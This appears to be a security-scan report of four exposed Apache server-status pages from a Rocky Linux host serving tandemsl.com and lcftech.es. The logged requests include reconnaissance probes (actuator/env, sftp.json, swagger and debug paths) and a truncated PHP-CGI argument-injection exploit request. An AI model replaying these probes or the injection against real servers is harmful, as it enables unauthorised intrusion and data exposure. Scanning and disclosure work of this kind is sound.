68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-183557050/299/1203W 17.180015393270.08.4027.43 68.183.180.73http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-18
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e36f7a40f6
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Dec-2025 04:19:30 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 42 Parent Server MPM Generation: 41 Server uptime: 7 days 19 hours 14 minutes 40 seconds Server load: 0.06 0.06 0.05 Total accesses: 275337 - Total Traffic: 8.0 GB - Total Duration: 264543611 CPU Usage: u57.4 s52.89 cu1437.99 cs743.81 - .34% CPU load .408 requests/sec - 12.4 kB/second - 30.4 kB/request - 960.799 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 031994no1yes010000 131992no0yes010000 231993no0yes010000 331991no0yes19000 432125no0yes010000 Sum501 149000 _________________________________W________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-41319940/169/4316_ 16.95770037425370.03.4399.72 172.71.30.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41319940/191/4211_ 16.984040000950.02.84152.58 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-41319940/188/4263_ 16.977031598050.03.3281.73 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-41319940/172/4271_ 16.8710028946280.023.97191.58 172.71.194.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41319940/156/4316_ 16.980033645740.036.81133.97 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-41319940/165/4484_ 16.982031648770.04.1497.91 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-41319940/172/4174_ 16.978044371060.04.20117.27 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-41319940/172/4309_ 16.801030581860.03.73126.42 104.23.248.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41319940/185/4228_ 16.971030334380.03.48137.67 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-41319940/175/4325_ 16.9711043005970.04.87126.16 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-41319920/136/7938_ 15.24340071299050.03.65258.50 172.64.200.101h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/124/7586_ 15.213410123879060.03.79207.25 172.64.200.108h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/130/7806_ 15.24340083441550.03.31231.19 172.64.200.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/120/7676_ 15.24345067069550.02.10203.46 172.64.200.50h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/126/7937_ 15.7617078267990.024.15286.82 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-41319920/119/7904_ 15.22340082027260.02.24237.89 172.68.159.221h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/125/7987_ 15.21341077922860.04.74277.14 172.64.200.121h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-41319920/123/7705_ 15.6316093592250.02.02197.02 172.68.12.46h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/101/7678_ 15.63340056531340.02.01201.82 172.68.12.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41319920/127/7955_ 15.24345057397190.017.93225.12 162.158.172.61h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/128/4496_ 14.23340140042470.01.65105.41 162.158.102.129h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/120/4580_ 14.59345033523710.01.03133.61 172.71.156.204h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/121/4498_ 14.15345032736680.01.31159.50 172.71.184.90h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/149/4508_ 14.23340031358300.08.89101.13 162.158.172.44h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/143/4511_ 14.59345046766570.02.50108.42 172.68.7.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/139/4502_ 14.58339031452410.02.22176.20 172.70.82.18h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/124/4503_ 14.23345030775280.02.37141.38 162.158.103.58h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/124/4412_ 14.22339032783680.03.30100.72 172.64.198.163h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/128/4596_ 14.23339031014970.01.68136.13 162.158.103.222h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41319930/128/4378_ 14.22340031500430.01.5491.51 172.64.200.61h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41319910/45/3910_ 10.766030666320.00.28157.24 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-41319910/34/3785_ 10.777090976530.00.45164.92 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-41319910/36/3876_ 10.776032022070.00.2995.44 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-41319910/30/3775W 10.760028691860.00.1684.39 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-41319910/37/3754_ 10.69960328722360.00.49151.19 104.23.245.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41319910/35/3791_ 10.764028743130.04.73190.73 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-41319910/52/3768_ 10.773033735700.00.46164.49 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-41319910/31/3650_ 10.592028894630.00.27129.28 172.70.214.79h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41319910/30/4014_ 10.769043860800.00.23144.33 165.227.84.14http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-41319910/37/3688_ 10.61356732176230.00.49110.61 172.70.100.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321250/177/7038_ 15.301471059878260.01.96175.54 162.158.172.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321250/194/7129_ 15.301469065995780.09.02194.03 172.64.198.42h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321250/194/7300_ 15.221470080536400.01.81191.15 172.71.184.229h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321250/191/7144_ 15.29345096524670.02.88200.33 172.64.200.169h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321250/174/7104_ 15.301470054105110.01.34168.89 172.64.200.169h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41321
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e33f3b0477
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 11-Dec-2025 08:26:13 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 5 days 23 hours 21 minutes 22 seconds Server load: 0.30 0.41 0.47 Total accesses: 207539 - Total Traffic: 5.5 GB - Total Duration: 226259805 CPU Usage: u58.92 s34.19 cu1064.82 cs557.64 - .332% CPU load .402 requests/sec - 11.3 kB/second - 28.0 kB/request - 1090.2 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04001912no4yes010011 14001778no1yes010000 24001779no0yes010000 34001777no0yes010000 44001780no1yes19000 Sum506 149011 ___________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3440019120/442/3707_ 32.00017734496880.08.6186.22 172.69.176.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3440019120/437/3539_ 31.983035503510.015.24138.43 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3440019120/448/3608_ 31.961028634240.08.8967.03 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 0-3440019120/488/3617_ 32.00431825758670.010.16150.63 172.71.82.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3440019120/462/3697_ 32.00050429808320.012.2379.00 162.158.6.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3440019120/473/3806_ 31.974028482300.010.4985.69 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-3440019120/443/3559_ 31.981041376380.012.2883.74 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3440019120/463/3665_ 32.011027813120.09.35111.09 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3440019120/441/3568_ 32.00528926505440.035.19124.17 104.23.211.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3440019120/468/3684_ 31.990038715370.010.6584.82 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/142/5729_ 11.582242760530880.02.19156.61 172.68.218.149h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/132/5699_ 11.60149338115273310.03.01151.76 172.70.43.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/141/5801_ 11.242743073519810.03.55163.24 162.158.179.206h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/121/5633_ 11.372245458360410.01.71151.00 172.71.124.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/142/5823_ 11.382159267362280.03.07158.80 162.158.9.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/135/5782_ 11.6427071770090.06.32169.99 172.71.95.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/130/5896_ 11.5614438869376750.015.34177.34 162.158.106.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/122/5765_ 11.551441884892440.03.39142.38 195.76.176.6h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/146/5718_ 11.542141846925110.03.58145.61 162.158.106.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3440017780/133/5917_ 11.64261649042160.03.03129.69 162.158.123.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/17/3980_ 5.0922344138115460.00.3194.76 172.71.82.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/22/4081_ 4.3922341131599250.00.55123.42 162.158.114.169h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/27/4025_ 5.0929145631036930.00.52148.51 172.71.82.53h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/17/3971_ 5.0529153129240440.00.6878.76 162.158.123.135h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3440017790/18/3991_ 5.212281845162510.00.3593.06 185.210.245.100h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/21/3995_ 5.06291112629836640.00.41111.71 162.158.123.135h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-3440017790/14/3970_ 5.1622859529413100.00.28131.07 104.23.175.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/19/3916_ 5.1528158029928340.00.3489.03 195.76.176.6http/1.1 2-3440017790/24/4048_ 5.2023355928820020.00.45124.52 172.71.246.6h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3440017790/22/3873_ 5.1722840129571140.00.4381.84 172.69.15.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/23/2078_ 5.0638641019931870.00.3985.76 162.158.163.240h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/20/2140_ 5.0948947079777070.00.3580.61 172.71.215.111h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/15/2088_ 5.1839145419990210.00.5363.81 172.68.164.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/16/2125_ 4.8648942420436820.00.4042.47 172.68.164.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/19/2060_ 5.0539648619841730.00.40116.12 20.169.105.44http/1.1 3-3440017770/11/2000_ 4.7425779118908900.00.2199.26 162.158.179.206h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/13/2061_ 5.0825742120181310.00.2484.78 172.71.215.111h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/14/1986_ 5.2326240818666260.00.2479.22 172.69.176.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3440017770/16/2129_ 5.1322148419110220.00.4054.04 195.76.176.6http/1.1 3-3440017770/12/2016_ 5.0238657018227870.00.2264.78 172.69.112.176h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-3440017800/118/5189_ 11.577048914390.02.13115.11 172.70.47.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3440017800/122/5249_ 11.64149549952690.02.33108.57 162.158.49.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3440017800/115/5397_ 11.623070569920.02.74119.63 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-3440017800/104/5276W 11.480085067140.01.85157.48 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-3440017800/127/5317_ 11.624044761490.02.17121.42 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-3440017800/119/5242
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e391f38bde
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 30-Nov-2025 21:47:56 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 423 Parent Server MPM Generation: 422 Server uptime: 79 days 9 hours 26 minutes 53 seconds Server load: 0.00 0.04 0.05 Total accesses: 2470186 - Total Traffic: 75.8 GB - Total Duration: 1588234201 CPU Usage: u201.43 s260.65 cu13768.3 cs7908.29 - .323% CPU load .36 requests/sec - 11.6 kB/second - 32.2 kB/request - 642.961 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01573631no3yes19002 11573632no1yes010000 21573765no0yes010000 31573630no0yes010000 41573633no0yes010000 Sum504 149002 _________W________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42215736310/87/45493_ 13.4900340200500.01.481680.73 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/98/44885_ 13.4900495054560.01.911440.84 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-42215736310/92/45454_ 13.4900227700970.02.661456.46 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-42215736310/98/45081_ 13.4900222064020.02.191492.75 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-42215736310/100/45786_ 13.4900215136780.02.611534.78 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-42215736310/79/45299_ 13.5100215043300.01.481540.10 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-42215736310/82/45477_ 13.5000297788470.02.931440.25 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-42215736310/95/44822_ 13.5100224336100.00.881531.68 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-42215736310/87/45619_ 13.5000219710320.01.511416.53 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-42215736310/92/45411W 13.4900329492200.02.241645.95 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-42215736320/192/50566_ 17.8100231333410.03.601665.50 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-42215736320/171/51032_ 17.6200269619490.02.861653.21 217.154.144.108http/1.1relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/195/50685_ 17.8100287423780.03.561564.45 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-42215736320/182/50604_ 17.8200728880890.03.501541.44 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-42215736320/185/51121_ 17.8200431414270.03.161603.21 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-42215736320/158/51799_ 17.79031249763920.01.691567.62 172.68.135.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/168/50919_ 17.691406282793670.04.191533.60 104.23.221.43h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/174/51564_ 17.8000228238860.03.791551.84 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/188/49742_ 17.8110359695080.03.211401.30 46.101.1.225http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-42215736320/178/51195_ 17.7210490603130.03.471495.14 172.70.100.28h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/109/48249_ 13.532160261751640.01.561437.80 172.71.146.240h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/99/47457_ 13.2012060401677710.01.431367.60 172.71.120.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/95/48134_ 12.5713404309854370.01.211500.28 172.69.224.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/103/47180_ 13.1012010241739790.05.901419.49 172.69.214.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/102/47512_ 11.852110251643070.01.611580.41 172.68.15.162h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/90/47999_ 11.8513400248796950.08.261399.36 172.70.135.104h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/115/47585_ 12.5812060226291060.02.081447.81 172.68.229.75h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/107/47878_ 12.582160255994180.04.981447.41 172.64.192.107h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/94/47815_ 13.15211168251672160.01.691621.76 172.68.7.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/98/48238_ 11.8512011268603610.01.581498.84 162.158.152.203h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/10/55369_ 7.0120860334926720.00.131706.11 162.158.79.34h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/8/53975_ 7.7328150300695690.01.481513.72 172.71.152.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/10/55265_ 7.0128100336183080.00.171686.13 172.68.245.197h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/10/54370_ 8.504090357364350.00.101802.84 108.162.212.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/10/54796_ 6.994090284945040.00.131568.61 104.23.211.215h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/9/54709_ 7.6920866270929390.00.071700.84 172.68.229.110h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/7/55172_ 7.694043305886000.00.111735.94 172.71.178.93h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/12/54954_ 7.004040390468030.00.161725.60 104.23.213.69h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/5/54103_ 4.712810882924577160.00.061647.26 172.71.190.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/14/55391_ 7.97209122409512280.00.111628.81 188.114.111.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/7/48146_ 7.7013883414249870.00.031577.41 172.68.229.134h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/7/48348_ 3.9528784287485790.00.091585.28 172.70.144.37h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/6/48344_ 7.7128830245966620.00.021605.29 172.69.224.172h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/4/48556_ 7.0613881266666440.00.031526.00 104.23.209.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/9/47792_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e30cccd0a0
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 28-Nov-2025 20:58:38 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 412 Parent Server MPM Generation: 411 Server uptime: 77 days 8 hours 37 minutes 35 seconds Server load: 0.18 0.45 0.42 Total accesses: 2437827 - Total Traffic: 74.8 GB - Total Duration: 1538219901 CPU Usage: u166.8 s230.19 cu13535.1 cs7743.55 - .324% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 630.98 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01395714no0yes19000 11395715no0yes010000 21395716no0yes010000 31395713no0yes010000 41395849no1yes19000 Sum501 248000 __R_____________________________________________W_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-41113957140/24/44841_ 1.9510335492450.00.351658.61 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-41113957140/26/44259_ 1.9430490218340.00.401428.46 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-41113957140/18/44814R 1.8600222335630.00.301438.85 172.70.100.42h2tandemsl.com:443GET /seguridad-de-producto-blog/novedades-adr-2023/ HTTP/2.0 0-41113957140/16/44396_ 1.9420217127610.00.221475.48 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-41113957140/26/45169_ 1.9430209063300.00.391512.25 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-41113957140/22/44671_ 1.9410210268180.00.371521.13 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-41113957140/22/44885_ 1.9230293207230.011.881427.39 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-41113957140/22/44190_ 1.90131218907250.00.451505.41 162.158.122.176h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41113957140/21/45006_ 1.9520214706050.00.361402.72 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-41113957140/21/44765_ 1.9400325345100.00.341630.80 138.197.191.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-41113957150/4/50058_ 0.58315463225028040.00.071651.21 104.23.175.144h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-41113957150/1/50560_ 0.32335586266936380.00.021640.05 162.158.190.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41113957150/1/50174_ 0.49310488277830400.00.021550.52 162.158.163.246h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-41113957150/1/50083_ 0.40335413718199910.00.021509.82 172.71.81.94h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-41113957150/2/50621_ 0.53310642242603500.00.041589.24 